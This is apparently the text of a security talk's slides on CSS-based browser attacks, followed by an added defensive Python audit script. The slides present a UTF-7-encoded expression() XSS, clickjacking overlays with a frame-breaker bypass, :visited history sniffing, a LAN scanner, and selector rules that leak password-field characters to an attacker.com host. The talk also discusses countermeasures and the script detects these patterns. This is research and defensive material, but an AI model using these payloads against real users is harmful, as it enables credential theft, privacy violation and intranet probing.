Old Attacks
New Research
New Attacks
Old Attacks - reloaded
@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-
Which produces:
* {xss:expression(alert(1))}
CSS Overlays (clickjacking)
CSS Overlays advanced attacks
<form
action="http://ficlets.com/signin/openid.signin"
method="post" id="openidform" target="iframe">
<input type="hidden" name="openid"
id="openidurl" class="textfield"
value="openidtester.pip.verisignlabs.com" />
</form>
ficlets.com connects to Verisign provider
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas
with solid colours and position the target area wherever we like
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used but solid fills make the attack harder to
protect against at the browser level
• Referer checking can neuter the attack, but it is not always available and is not
implemented on most sites
• Referer can be faked
• David Ross idea to use a "clickjacket", accessible style sheet
which uses expressions to display a hover popup which appears
above other elements.
CSS Overlays Workarounds
Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframe-breaker-breaker)
<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;"
onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html
width=500 height=500 codetype=text/html></iframe></image>
</body>
</html>
Exploiting clickjacking defenses
iframe,frame,object,applet {
border:1px solid #000 !important;
visibility:visible !important;
opacity: 1 !important;
filter: alpha(opacity=100) !important;
position:absolute !important;
float:none !important;
overflow:auto !important;
....
}
More clickjacking defenses
Advantages:
• Object styles are locked
• User can see clearly that it is an external site
• Javascript and CSS modification of styles have no effect
Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses
Advantages:
• Hard for attacker to exploit if external objects are clearly visible
and above everything else
Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
New Research
Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css
How:
element:condition{
action;
}
element: anything
condition: :visited, :active, :hover, :selected, etc..
action: background(remote request), display,
opacity, visibility.
Loops
- Check out Demos on http://p42.us/css
Recalc of style:
- META refreshes
<meta http-equiv="refresh" content="0;URL=#1">
- -moz-binding
*{-moz-binding:url("remote-req#id")}
For matching:
<input type="password" value="savedpassword"/>
• input{}
– Matches all inputs.
• input[type]{}
– Matches all inputs with an attribute “type”.
• input[type="password"]{}
– Matches all inputs of type “password”.
CSS HTML Attribute Reader
For matching:
<input type="password" value="savedpassword"/>
• input[type*="swor"]{}
– Matches all input elements whose type attribute contains "swor"
(anywhere)
• input[type^="pass"]{}
– Matches all inputs whose type attribute starts with "pass"
• input[type$="word"]{}
– Matches all inputs whose type attribute ends with "word"
CSS HTML Attribute Reader
Attempts to read an attribute with [=] selector with help of the [*=]
selector!
Calculate the range of the chars in the value.
input[value*="\x10"]{
background:url("//attacker.com/?h=\x10");
}
…
111 different variations
…
input[value*="\x7F"]{
background:url("//attacker.com/?h=\x7F");
}
CSS HTML Attribute Reader – Try 3
First, we can use [^=] and [$=] selectors at the same time halving
the number of requests.
CSS HTML Attribute Reader
1. Detect the range
2. Detect first char and eighth char
3. Detect second char and seventh char
4. Detect third char and sixth char
5. Detect fourth char and fifth char
6. Confirm we have the correct string
CSS HTML Attribute Reader
Demo:
-
Async stylesheet load attribute reader (read the contents of a text field w
http://eaea.sirdarckcat.net/cssar/
These will inherit all styles of the parent document (cross origin).
<style>@import "exploit";</style>
<iframe src="victim" seamless="seamless"/>
CSS History Hacks
Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/"> </a>
Impact Privacy
Counter-measures
Firefox: SafeHistory addon
IE: Disable history
Demo: http://ha.ckers.org/weird/CSS-history.cgi
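As an added example (not from the slides or their authors), a small Python audit that applies the checks behind the three techniques above to a stylesheet: it decodes a sheet that declares UTF-7 so the hidden expression() rule becomes visible, and it flags attribute-selector rules and :visited rules whose declarations make a remote request. The sample stylesheets and the attacker.example host are constructed for this example.

```python
import codecs
import re

# Constructed sample input: the UTF-7 stylesheet from the slides (joined on
# one line) and a sheet with one attribute-reader rule and two history rules.
SAMPLE_UTF7 = ('@charset "UTF-7";\n+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcw'
               'BpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-')
SAMPLE_CSS = '''
input[value^="pa"]{background:url("//attacker.example/?h=pa")}
a:visited{background:url(//attacker.example/visited)}
a:not(:visited){background:url(//attacker.example/not-visited)}
'''

CHARSET_RE = re.compile(r'^\s*@charset\s+"UTF-7"\s*;', re.I)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")  # selector { declarations }
# attribute selector using a substring (*=), prefix (^=) or suffix ($=) operator
ATTR_RE = re.compile(r"\[\s*([\w-]+)\s*([*^$]=)\s*[\"']?([^\"'\]]*)[\"']?\s*\]")
# url() that points at another host (absolute or protocol-relative)
REMOTE_URL_RE = re.compile(r"url\(\s*[\"']?((?:https?:)?//[^\"')\s]+)", re.I)

def normalize(css):
    """If the sheet declares UTF-7, decode it so hidden rules become visible."""
    m = CHARSET_RE.match(css)
    if m:
        return codecs.decode(css[m.end():].encode("ascii"), "utf-7")
    return css

def find_leaks(css):
    """Return (kind, detail, evidence) tuples for rules that leak information."""
    findings = []
    for sel, decl in RULE_RE.findall(normalize(css)):
        sel = sel.strip()
        if "expression(" in decl:            # IE expression(): script inside CSS
            findings.append(("expression", sel, decl.strip()))
        urls = REMOTE_URL_RE.findall(decl)
        if not urls:
            continue                         # no remote request, nothing leaks
        for attr, op, frag in ATTR_RE.findall(sel):
            # attribute reader: the request fires only if attr matches frag
            findings.append(("attribute", f"{attr}{op}{frag}", urls[0]))
        if ":visited" in sel:
            # history leak: whether the request fires depends on browser history
            findings.append(("history", sel, urls[0]))
    return findings

if __name__ == "__main__":
    for css in (SAMPLE_UTF7, SAMPLE_CSS):
        for finding in find_leaks(css):
            print(finding)
```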
CSS LAN Scanner
PoC:
CSS LAN Scanner
How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks
if they were marked as visited.
CSS LAN Scanner
(diagram: attacker.com; victim LAN intranet with a private webservice (10.3.22.111) and a router configuration page (192.168.1.254))
CSSH - CSS Stealing Some History
attacker.com shows the victim a lot of possible websites that the user may have
visited (diagram: digg.com, twitter.com, slashdot.org, hi5.com, myspace).
CSSH - History Crawler
(animated diagram: victim)
CSSH - Navigation Monitoring
What if...
Yes
(animated diagram: the attacker observes the victim's navigation as digg.com and then cnn.com appear)
Public Demo :
http://eaea.sirdarckcat.net/cssh-mon/
Cross-browser.
Thanks